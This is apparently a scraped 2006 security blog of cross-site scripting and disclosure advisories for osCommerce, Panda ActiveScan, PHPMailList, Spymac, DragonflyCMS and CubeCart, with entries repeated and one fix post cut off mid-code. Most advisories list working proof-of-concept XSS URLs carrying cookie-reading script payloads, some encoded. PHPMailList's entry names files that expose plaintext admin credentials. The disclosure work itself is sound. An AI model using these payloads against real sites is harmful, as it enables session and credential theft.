La curiosidad es lo que hace mover la mente....
osCommerce multiple Scripts 'page' param XSS
Tuesday, October 03, 2006
###############################################
osCommerce multiple Scripts 'page' param XSS
Vendor url: http://www.oscommerce.com
Vendor Bugtracker:http://www.oscommerce.com/community/bugs,4303
Advisore: http://lostmon.blogspot.com/2006/10/
oscommerce-multiple-scripts-page-param.html
Vendor notify:yes
OSVDB ID:29795,29796,29797,29798,29799,29800,
29801,29802,29803,29804,29805,29806,
29807,29808
Securitytracker:1016979
BID:20343
Secunia:SA22275
FrSIRT: FrSIRT/ADV-2006-3917
###############################################
osCommerce contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'page' param upon submission to multiple scripts
in /admin folder.This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.
The same situation is done in 'admin/geo_zones.php' but with
param 'zpage'.
####################
vERSIONS
####################
osCommerce 2.2 Milestone 2 Update 060817
####################
SOLUTION
####################
no solution was available at this time.
#######################
VULNERABLE CODE
#######################
Arround the line 30 in banner_manager.php we
tep_redirect(tep_href_link(FILENAME_BANNER_MANAGER,
'page=' . $HTTP_GET_VARS['page'] . '&bID=' .
$HTTP_GET_VARS['bID']));
the page param is called directly , not sanitize.
arround line 115 we have a similar situation ,
we GET page param without sanitice in any GET request.
In all of scripts vulnerables, we have the same situation,
but with diferent code
####################
scripts vulnerables
####################
admin/banner_manager.php
admin/banner_statistics.php
admin/countries.php
admin/currencies.php
admin/languages.php
admin/manufacturers.php
admin/newsletters.php
admin/orders_status.php
admin/products_attributes.php
admin/products_expected.php
admin/reviews.php
admin/specials.php
admin/stats_products_purchased.php
admin/stats_products_viewed.php
admin/tax_classes.php
admin/tax_rates.php
admin/zones.php
####################
Timeline
####################
Discovered: 27-09-2006
Vendor notify:03-10-2006
Vendor response:------
Vendor fix:--------
Disclosure: 03-10-2006 (vendor Bugtracker)
Public disclosure:04-10-2006
####################
EXAMPLES
####################
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
osCommerce multiple Scripts 'page' param XSS
Vendor url: http://www.oscommerce.com
Vendor Bugtracker:http://www.oscommerce.com/community/bugs,4303
Advisore: http://lostmon.blogspot.com/2006/10/
oscommerce-multiple-scripts-page-param.html
Vendor notify:yes
OSVDB ID:29795,29796,29797,29798,29799,29800,
29801,29802,29803,29804,29805,29806,
29807,29808
Securitytracker:1016979
BID:20343
Secunia:SA22275
FrSIRT: FrSIRT/ADV-2006-3917
###############################################
osCommerce contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'page' param upon submission to multiple scripts
in /admin folder.This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.
The same situation is done in 'admin/geo_zones.php' but with
param 'zpage'.
####################
vERSIONS
####################
osCommerce 2.2 Milestone 2 Update 060817
####################
SOLUTION
####################
no solution was available at this time.
#######################
VULNERABLE CODE
#######################
Arround the line 30 in banner_manager.php we
tep_redirect(tep_href_link(FILENAME_BANNER_MANAGER,
'page=' . $HTTP_GET_VARS['page'] . '&bID=' .
$HTTP_GET_VARS['bID']));
the page param is called directly , not sanitize.
arround line 115 we have a similar situation ,
we GET page param without sanitice in any GET request.
In all of scripts vulnerables, we have the same situation,
but with diferent code
####################
scripts vulnerables
####################
admin/banner_manager.php
admin/banner_statistics.php
admin/countries.php
admin/currencies.php
admin/languages.php
admin/manufacturers.php
admin/newsletters.php
admin/orders_status.php
admin/products_attributes.php
admin/products_expected.php
admin/reviews.php
admin/specials.php
admin/stats_products_purchased.php
admin/stats_products_viewed.php
admin/tax_classes.php
admin/tax_rates.php
admin/zones.php
####################
Timeline
####################
Discovered: 27-09-2006
Vendor notify:03-10-2006
Vendor response:------
Vendor fix:--------
Disclosure: 03-10-2006 (vendor Bugtracker)
Public disclosure:04-10-2006
####################
EXAMPLES
####################
http://localhost/catalog/admin/banner_manager.php?page=1[XSS-code]
http://localhost/catalog/admin/banner_statistics.php?page=1[XSS-code]
http://localhost/catalog/admin/countries.php?page=1[XSS-code]
http://localhost/catalog/admin/currencies.php?page=1[XSS-code]
http://localhost/catalog/admin/languages.php?page=1[XSS-code]
http://localhost/catalog/admin/manufacturers.php?page=1[XSS-code]
http://localhost/catalog/admin/newsletters.php?page=1[XSS-code]
http://localhost/catalog/admin/orders_status.php?page=1[XSS-code]
http://localhost/catalog/admin/products_attributes.php?page=1[XSS-code]
http://localhost/catalog/admin/products_expected.php?page=1[XSS-code]
http://localhost/catalog/admin/reviews.php?page=1[XSS-code]
http://localhost/catalog/admin/specials.php?page=1[XSS-code]
http://localhost/catalog/admin/stats_products_purchased.php?page=1[XSS-code]
http://localhost/catalog/admin/stats_products_viewed.php?page=1[XSS-code]
http://localhost/catalog/admin/tax_classes.php?page=1[XSS-code]
http://localhost/catalog/admin/tax_rates.php?page=1[XSS-code]
http://localhost/catalog/admin/zones.php?page=1[XSS-code]
this is a simple evil url but we can do some moore elaborate url
in conjuncion with other archives not vulnerables... like this:
http://localhost/catalog/admin/categories.php?action=new_product_preview
&read=only&pID=12&origin=stats_products_viewed.php?page=2[XSS-code]
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Panda ActiveScan XSS vulnerability
Wednesday, August 09, 2006
################################################
Panda ActiveScan XSS vulnerability
Vendor urL:http://www.pandasoftware.es or .com
Advisore:http://lostmon.blogspot.com/2006/08/
panda-activescan-xss-vulnerability.html
vendor notify:yes exploit available:yes
OSVDB ID:29147
Securitytracker:1016696
BID:19471
################################################
Panda ActiveScan contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'email' variable upon submission to the ascan_6.asp
script.This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,leading
to a loss of integrity.
##########
versions:
##########
Panda ActiveScan 5.53.00
##########
Solution:
##########
Panda has release a new version of ActiveScan
at 14-08-2006
#########
timeline:
#########
discovered : 01-08-2006
vendor notify :05-08-2006
vendor response :14-08-2006
vendor fix:14-08-2006
disclosure:9-08-2005
################
test
################
http://www.pandasoftware.com/activescan/activescan/
ascan_6.asp?IdLang=2&Idvendor=17490&Idpais=63&email=
Lostmon@gmail.com%22%3E%3Cscript%3Ealert%28%27XSS%20
Vulnerability%27%29%3C/script%3E%26&pais=62&
provincia=9&tipousuario=0&enviar=1&ode=0#
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Panda ActiveScan XSS vulnerability
Vendor urL:http://www.pandasoftware.es or .com
Advisore:http://lostmon.blogspot.com/2006/08/
panda-activescan-xss-vulnerability.html
vendor notify:yes exploit available:yes
OSVDB ID:29147
Securitytracker:1016696
BID:19471
################################################
Panda ActiveScan contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'email' variable upon submission to the ascan_6.asp
script.This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,leading
to a loss of integrity.
##########
versions:
##########
Panda ActiveScan 5.53.00
##########
Solution:
##########
Panda has release a new version of ActiveScan
at 14-08-2006
#########
timeline:
#########
discovered : 01-08-2006
vendor notify :05-08-2006
vendor response :14-08-2006
vendor fix:14-08-2006
disclosure:9-08-2005
################
test
################
http://www.pandasoftware.com/activescan/activescan/
ascan_6.asp?IdLang=2&Idvendor=17490&Idpais=63&email=
Lostmon@gmail.com%22%3E%3Cscript%3Ealert%28%27XSS%20
Vulnerability%27%29%3C/script%3E%26&pais=62&
provincia=9&tipousuario=0&enviar=1&ode=0#
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Multiple Vulnerabilities in PHPMailList 1.8.0
Wednesday, July 05, 2006
########################################################
Multiple Vulnerabilities in PHPMailList 1.8.0
Vendor url: http://php.warpedweb.net/
Advisore:http://lostmon.blogspot.com/2006/07/
multiple-vulnerabilities-in.html
VEndor notify:yes Explotation include:yes
osvdb id:27016,27017,27018
Securitytracker:1016439
BID:18840
FrSIRT: FrSIRT/ADV-2006-2690
########################################################
################
Description
################
PHPMailList is a powerful, yet simple to use, email announcement script.
It allows people to subscribe/unsubscribe through a web-based form,
checking for valid addresses.The web-based administration module allows
the owner to send messages to the list, subscribe/unsubscribe people,
view the list of subscriber, and configure the script.Installation is
simple, and configuration of confirmation messages, welcome messages
and goodbye messages, as well as signatures are all maintained through
the password protected administration section.
PHPMailList have multiple vulnerabilities like XSS. information disclosure
Plain text administrator username/password disclosure.
##############
versions
##############
PHPMaiLlist 1.8.0 and prior versions
#####################
Cross site scripting
#####################
PHPMailList have a flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate poperly the
input parsed in the email field upon submission to '/maillist.php'
script.This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading to a loss of integrity.
######################
Information disclosure
######################
direct request to file 'list.dat' reveal all email address of all suscribers.
Direct request to file 'ml_config.dat' reveal all configuration information.
#####################################
Plain text administrator disclosure:
#####################################
Direct request to file 'ml_config.dat' reveal in the first line
the admin username and in the second the admin password in plain text
######################
Timeline
######################
Discovered: 06-jun-2006
Vendor notify:No have a forum and no have a mail address...
vendor response:-------
Disclosure:06-jul-2006
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Multiple Vulnerabilities in PHPMailList 1.8.0
Vendor url: http://php.warpedweb.net/
Advisore:http://lostmon.blogspot.com/2006/07/
multiple-vulnerabilities-in.html
VEndor notify:yes Explotation include:yes
osvdb id:27016,27017,27018
Securitytracker:1016439
BID:18840
FrSIRT: FrSIRT/ADV-2006-2690
########################################################
################
Description
################
PHPMailList is a powerful, yet simple to use, email announcement script.
It allows people to subscribe/unsubscribe through a web-based form,
checking for valid addresses.The web-based administration module allows
the owner to send messages to the list, subscribe/unsubscribe people,
view the list of subscriber, and configure the script.Installation is
simple, and configuration of confirmation messages, welcome messages
and goodbye messages, as well as signatures are all maintained through
the password protected administration section.
PHPMailList have multiple vulnerabilities like XSS. information disclosure
Plain text administrator username/password disclosure.
##############
versions
##############
PHPMaiLlist 1.8.0 and prior versions
#####################
Cross site scripting
#####################
PHPMailList have a flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate poperly the
input parsed in the email field upon submission to '/maillist.php'
script.This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading to a loss of integrity.
######################
Information disclosure
######################
direct request to file 'list.dat' reveal all email address of all suscribers.
Direct request to file 'ml_config.dat' reveal all configuration information.
#####################################
Plain text administrator disclosure:
#####################################
Direct request to file 'ml_config.dat' reveal in the first line
the admin username and in the second the admin password in plain text
######################
Timeline
######################
Discovered: 06-jun-2006
Vendor notify:No have a forum and no have a mail address...
vendor response:-------
Disclosure:06-jul-2006
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Multiple Cross site scripting in Spymac WOS V
Wednesday, May 17, 2006
##########################################################
Multiple Cross site scripting in Spymac WOS V
Vendor url: http://www.spymac.com
Advisore:http://lostmon.blogspot.com/2006/05/
multiple-cross-site-scripting-in.html
Vendor notify: yes Exploit available: yes
OSVDB ID:25925,25926,25927,
Securitytracker:1016116
FrSIRT/ADV-2006-1852
##########################################################
Spymac WOS is powered by an integrated collection of Web
and desktop applications that together form "Spymac WOS".
Developed in-house, Spymac WOS is an intelligent environment
featuring patent-pending technology that allows for the creation
of an immersive and visually-stunning Web experience.
Spymac have a flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading to a loss of integrity.
#######################
Versions
#######################
Spymac WOS V
########################
Solution:
########################
No solution was available at this time.
########################
Examples
########################
for view some examples... need a client login.
http://[VICTIM]/notes/index.php?action=delete_folder&del_folder=[XSS-CODE]
http://[VICTIM]/notes/index.php?action=empty_trash[XSS-CODE]
http://[VICTIM]/ipod/get_ipod.php?curr=10[XSS-CODE]
http://[VICTIM]/notes/index.php?action=noteform&nick=Lostmon[XSS-CODE]
http://[VICTIM]/login.php?[XSS-CODE]
some others variables are subsceptibles to the same flaw.
########################
TIMELINE
########################
Discovered:02-05-2006
Vendor notify:14-05-2006
Vendor response:-------------
Disclosure:17-05-2006
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Multiple Cross site scripting in Spymac WOS V
Vendor url: http://www.spymac.com
Advisore:http://lostmon.blogspot.com/2006/05/
multiple-cross-site-scripting-in.html
Vendor notify: yes Exploit available: yes
OSVDB ID:25925,25926,25927,
Securitytracker:1016116
FrSIRT/ADV-2006-1852
##########################################################
Spymac WOS is powered by an integrated collection of Web
and desktop applications that together form "Spymac WOS".
Developed in-house, Spymac WOS is an intelligent environment
featuring patent-pending technology that allows for the creation
of an immersive and visually-stunning Web experience.
Spymac have a flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading to a loss of integrity.
#######################
Versions
#######################
Spymac WOS V
########################
Solution:
########################
No solution was available at this time.
########################
Examples
########################
for view some examples... need a client login.
http://[VICTIM]/notes/index.php?action=delete_folder&del_folder=[XSS-CODE]
http://[VICTIM]/notes/index.php?action=empty_trash[XSS-CODE]
http://[VICTIM]/ipod/get_ipod.php?curr=10[XSS-CODE]
http://[VICTIM]/notes/index.php?action=noteform&nick=Lostmon[XSS-CODE]
http://[VICTIM]/login.php?[XSS-CODE]
some others variables are subsceptibles to the same flaw.
########################
TIMELINE
########################
Discovered:02-05-2006
Vendor notify:14-05-2006
Vendor response:-------------
Disclosure:17-05-2006
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Multiple Cross site scripting in dragonflycms
Wednesday, February 22, 2006
######################################################
Multiple Cross site scripting in dragonflycms 9.0.6.1
Vendor url:http://dragonflycms.org/
Advisore: http://lostmon.blogspot.com/2006/02/
multiple-cross-site-scripting-in.html
Vendor notify: exploit available: yes
OSVDB ID:23408,23409,23410,23411,23412,23413,23414,23415
Securitytracker:1015661
Secunia:18940
BID:16784
FrSIRT:ADV-2006-0688
######################################################
Description:
"Dragonfly CMS is a powerful, feature-rich, Open Source
content management system (CMS) based on PHP-Nuke 6.5.
We have spent over a year developing Dragonfly CMS,
paying close attention to security and reliability. The
release of Dragonfly marks yet another exciting milestone
in our history."
CPG Dragonfly is vulnerable to cross site scripting that
allow attackers to steal information from users by adding
JavaScript code via some of the parameters used by the CMS
product.
######################
Versions
######################
prior to Dragonfly 9.0.6.1
#########################
Solution
########################
No solution was available at this time.
##########################
Timeline
##########################
discovered:12-02-2006
vendor notify:20-02-2006 (web form "contact us")
vendor response:---------
disclosure:22-02-2006
#############################
XSS in module 'Your_Account'
#############################
http://[Victim]/index.php?name=Your_Account&error=1
&uname=bGFsYWxh"><script>alert(document.cookie)
</script>
http://[Victim]/index.php?name=Your_Account&error=1
"><script>alert(document.cookie)</script>
&uname=bGFsYWxh
http://[Victim]/index.php?name=Your_Account&profile=3
"><script>alert(document.cookie)</script>
http://[Victim]/index.php?name=Your_Account&error=1&uname=
PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
this PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
is this "><script>alert(document.cookie)</script>
base64 cross site scripting , the XSS code are encoded in base64.
the username field are vulnerable too
insert in the box <script>alert()</script>
and this code is executed...
#######################
XSS in module 'News'
#######################
http://[Victim]/index.php?name=News&catid=1"><script>alert()</script>
http://[Victim]/index.php?name=News&file=article&sid=7"><script>alert()</script>
http://[Victim]/index.php?name=News&file=submit
// texareas 'Story Text' and Extended text are vulnerables.
http://[Victim]/index.php?name=News&file=friend&sid=5"><script>alert()</script>
#################################
XSS in module 'Stories_Archive'
#################################
http://[Victim]/index.php?name=Stories_Archive&sa=show_month
&year=2005&month=11"><script>alert()</script>
http://[Victim]/index.php?name=Stories_Archive&sa=show_month
&year=2005"><script>alert()</script>
>&month=11
http://[Victim]/index.php?name=Stories_Archive&sa=show_all
"><script>alert()</script>
###########################
XSS in module 'Web_Links'
###########################
http://[Victim]/index.php?name=Web_Links&l_op=viewlink
&cid=15&min=10&orderby=title%20ASC&show=0"><script>alert
(document.cookie)</script>
http://[Victim]/index.php?name=Web_Links&l_op=viewlink
&cid=15"><script>alert()</script>
http://[Victim]/index.php?name=Web_Links&l_op=toprated
&ratenum=5&ratetype=percent"><script>alert()</script>
http://[Victim]/index.php?name=Web_Links&l_op=viewlink&cid=15
&orderby=titled"><script>alert()</script>
###########################
XSS in module 'Surveys'
###########################
http://[Victim]/index.php?name=Surveys&op=results
"><script>alert()</script>pollid=3
http://[Victim]/index.php?name=Surveys&op=results&pollid=5
"><script>alert()</script>
###########################
XSS in module 'Downloads'
###########################
http://[Victim]/index.php?name=Downloads&c=1"><script>alert()</script>
###########################
XSS in module 'coppermine'
###########################
http://[Victim]/coppermine/thumbnails/meta=">
<script>alert()</script>
topn/album=1.html
http://[Victim]/coppermine/thumbnails/metatopn/album=1.html
"><script>alert()</script>
http://[Victim]/index.php?name=coppermine&file=thumbnails&album=1
"><script>alert()</script>
############################
XSS in module -Search-
############################
http://[Victim]/index.php?name=Search
User input passed to the search box in the following
modules is not sanitised before being returned to users:
Search
Stories_Archive
Downloads
Topics
if we insert in the search box this code "><script>alert()</script>
this is executed wen we click in Search button.
####################### €nd ############################
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Multiple Cross site scripting in dragonflycms 9.0.6.1
Vendor url:http://dragonflycms.org/
Advisore: http://lostmon.blogspot.com/2006/02/
multiple-cross-site-scripting-in.html
Vendor notify: exploit available: yes
OSVDB ID:23408,23409,23410,23411,23412,23413,23414,23415
Securitytracker:1015661
Secunia:18940
BID:16784
FrSIRT:ADV-2006-0688
######################################################
Description:
"Dragonfly CMS is a powerful, feature-rich, Open Source
content management system (CMS) based on PHP-Nuke 6.5.
We have spent over a year developing Dragonfly CMS,
paying close attention to security and reliability. The
release of Dragonfly marks yet another exciting milestone
in our history."
CPG Dragonfly is vulnerable to cross site scripting that
allow attackers to steal information from users by adding
JavaScript code via some of the parameters used by the CMS
product.
######################
Versions
######################
prior to Dragonfly 9.0.6.1
#########################
Solution
########################
No solution was available at this time.
##########################
Timeline
##########################
discovered:12-02-2006
vendor notify:20-02-2006 (web form "contact us")
vendor response:---------
disclosure:22-02-2006
#############################
XSS in module 'Your_Account'
#############################
http://[Victim]/index.php?name=Your_Account&error=1
&uname=bGFsYWxh"><script>alert(document.cookie)
</script>
http://[Victim]/index.php?name=Your_Account&error=1
"><script>alert(document.cookie)</script>
&uname=bGFsYWxh
http://[Victim]/index.php?name=Your_Account&profile=3
"><script>alert(document.cookie)</script>
http://[Victim]/index.php?name=Your_Account&error=1&uname=
PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
this PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
is this "><script>alert(document.cookie)</script>
base64 cross site scripting , the XSS code are encoded in base64.
the username field are vulnerable too
insert in the box <script>alert()</script>
and this code is executed...
#######################
XSS in module 'News'
#######################
http://[Victim]/index.php?name=News&catid=1"><script>alert()</script>
http://[Victim]/index.php?name=News&file=article&sid=7"><script>alert()</script>
http://[Victim]/index.php?name=News&file=submit
// texareas 'Story Text' and Extended text are vulnerables.
http://[Victim]/index.php?name=News&file=friend&sid=5"><script>alert()</script>
#################################
XSS in module 'Stories_Archive'
#################################
http://[Victim]/index.php?name=Stories_Archive&sa=show_month
&year=2005&month=11"><script>alert()</script>
http://[Victim]/index.php?name=Stories_Archive&sa=show_month
&year=2005"><script>alert()</script>
>&month=11
http://[Victim]/index.php?name=Stories_Archive&sa=show_all
"><script>alert()</script>
###########################
XSS in module 'Web_Links'
###########################
http://[Victim]/index.php?name=Web_Links&l_op=viewlink
&cid=15&min=10&orderby=title%20ASC&show=0"><script>alert
(document.cookie)</script>
http://[Victim]/index.php?name=Web_Links&l_op=viewlink
&cid=15"><script>alert()</script>
http://[Victim]/index.php?name=Web_Links&l_op=toprated
&ratenum=5&ratetype=percent"><script>alert()</script>
http://[Victim]/index.php?name=Web_Links&l_op=viewlink&cid=15
&orderby=titled"><script>alert()</script>
###########################
XSS in module 'Surveys'
###########################
http://[Victim]/index.php?name=Surveys&op=results
"><script>alert()</script>pollid=3
http://[Victim]/index.php?name=Surveys&op=results&pollid=5
"><script>alert()</script>
###########################
XSS in module 'Downloads'
###########################
http://[Victim]/index.php?name=Downloads&c=1"><script>alert()</script>
###########################
XSS in module 'coppermine'
###########################
http://[Victim]/coppermine/thumbnails/meta=">
<script>alert()</script>
topn/album=1.html
http://[Victim]/coppermine/thumbnails/metatopn/album=1.html
"><script>alert()</script>
http://[Victim]/index.php?name=coppermine&file=thumbnails&album=1
"><script>alert()</script>
############################
XSS in module -Search-
############################
http://[Victim]/index.php?name=Search
User input passed to the search box in the following
modules is not sanitised before being returned to users:
Search
Stories_Archive
Downloads
Topics
if we insert in the search box this code "><script>alert()</script>
this is executed wen we click in Search button.
####################### €nd ############################
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
MANUAL FIX FOR CROSS _SITE SCRIPTING Cubecart 3.0.7 pl1
Monday, January 23, 2006
########################################################
MANUAL FIX FOR CROSS _SITE SCRIPTING Cubecart 3.0.7 pl1
vendor entry: http://bugs.cubecart.com/?do=details&id=459
advisore:http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html
references:
OSVDB ID:22471
Secunia:SA18519
BID:16259
##########################################################
1- includes/funcions.inc.php
2- index.php fix params 'act' and 'searchStr'
3- fix 'catId' param includes/content/viewCat.inc.php
4- fix 'productId' param open includes/content/viewProd.inc.php
5- cart.php fix params 'act' and 'searchStr'
6- fix param 'docId' includes/content/viewDoc.inc.php
7- 7- fix 'act' , 'username' ,'password','remember' and 'redir' params in includes/content/login.inc.php
8- fix 'productId' and $_POST includes/content/tellafriend.inc.php
9- Thanks
#############################
1 includes/functions.inc.php
#############################
open includes/functions.inc.php look this code :
arround line 82 ...
-------------------------------------------------------
//////////////////////////////////
// treat GET vars stop XSS
////////
function treatGet($text){
$text = preg_replace("/(\ Tuesday, January 10, 2006
MANUAL FIX FOR CROSS _SITE SCRIPTING Cubecart 3.0.7 pl1
vendor entry: http://bugs.cubecart.com/?do=details&id=459
advisore:http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html
references:
OSVDB ID:22471
Secunia:SA18519
BID:16259
##########################################################
1- includes/funcions.inc.php
2- index.php fix params 'act' and 'searchStr'
3- fix 'catId' param includes/content/viewCat.inc.php
4- fix 'productId' param open includes/content/viewProd.inc.php
5- cart.php fix params 'act' and 'searchStr'
6- fix param 'docId' includes/content/viewDoc.inc.php
7- 7- fix 'act' , 'username' ,'password','remember' and 'redir' params in includes/content/login.inc.php
8- fix 'productId' and $_POST includes/content/tellafriend.inc.php
9- Thanks
#############################
1 includes/functions.inc.php
#############################
open includes/functions.inc.php look this code :
arround line 82 ...
-------------------------------------------------------
//////////////////////////////////
// treat GET vars stop XSS
////////
function treatGet($text){
$text = preg_replace("/(\ Tuesday, January 10, 2006
################################################
CubeCart 3.0.7-pl1 multiple variable Cross site scripting
Vendor url: www.cubecart.com
bug report:http://bugs.cubecart.com/?do=details&id=459
Advisore:http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html.
vendor notify:yes exploit avalable: yes
OSVDB ID:22471
Secunia:SA18519
BID:16259
################################################
I recomended to all vendors to look this paper..
This is the new posible impact of XSS atacks:
http://www.bindshell.net/papers/xssv.html
CubeCart contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
some variables upon submission to 'index.php' scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a
loss of integrity.
###############
VERSIONS
###############
CubeCart 3.0.7-pl1 vulnerable.
Other versions are posible vulnerables too
#################
Timeline
#################
Discovered: 24 dec 2005
vendor notify: 10-01-2006
Vendor response:
Solution:
Disclosure: 10-01-2006
Public disclosure:16-01-2006
###############
Examples:
###############
http://victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt
by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH
QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ
XdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://[victim]/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://[victim]cc3/index.php?searchStr=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat
&Submit=Go
http://[victim]cc3/index.php?act=login&redir=L3NpdG
UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb
2NJZD0x=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://victim]/cc3/index.php?act=viewProd&productId=1"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewDoc&docId=3"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewProd"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewCat&catId=1"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewCat&catId=saleItems"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat
http://victim]/cc3/index.php?act=viewDoc&docId=1"><script>
alert(document.cookie)</script>
#################
User field XSS
#################
Go to http://victim]/cc3/index.php?act=login
and inser in the username field this: "><script>
alert(document.cookie)</script>
#############
SOLUTION
#############
no solution was available at this time
currently i found a posible fix :
see
http://lostmon.blogspot.com/2006/01/
manual-fix-for-cross-site-scripting.html
or
http://bugs.cubecart.com/?do=details&id=459
##################### €nd ########################
Thnx to estrella to be my ligth
Thnx to all manglers of http://www.osvdb.org
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
CubeCart 3.0.7-pl1 multiple variable Cross site scripting
Vendor url: www.cubecart.com
bug report:http://bugs.cubecart.com/?do=details&id=459
Advisore:http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html.
vendor notify:yes exploit avalable: yes
OSVDB ID:22471
Secunia:SA18519
BID:16259
################################################
I recomended to all vendors to look this paper..
This is the new posible impact of XSS atacks:
http://www.bindshell.net/papers/xssv.html
CubeCart contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
some variables upon submission to 'index.php' scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a
loss of integrity.
###############
VERSIONS
###############
CubeCart 3.0.7-pl1 vulnerable.
Other versions are posible vulnerables too
#################
Timeline
#################
Discovered: 24 dec 2005
vendor notify: 10-01-2006
Vendor response:
Solution:
Disclosure: 10-01-2006
Public disclosure:16-01-2006
###############
Examples:
###############
http://victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt
by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH
QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ
XdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://[victim]/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://[victim]cc3/index.php?searchStr=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat
&Submit=Go
http://[victim]cc3/index.php?act=login&redir=L3NpdG
UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb
2NJZD0x=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://victim]/cc3/index.php?act=viewProd&productId=1"><script>
alert(document.cookie)</script>
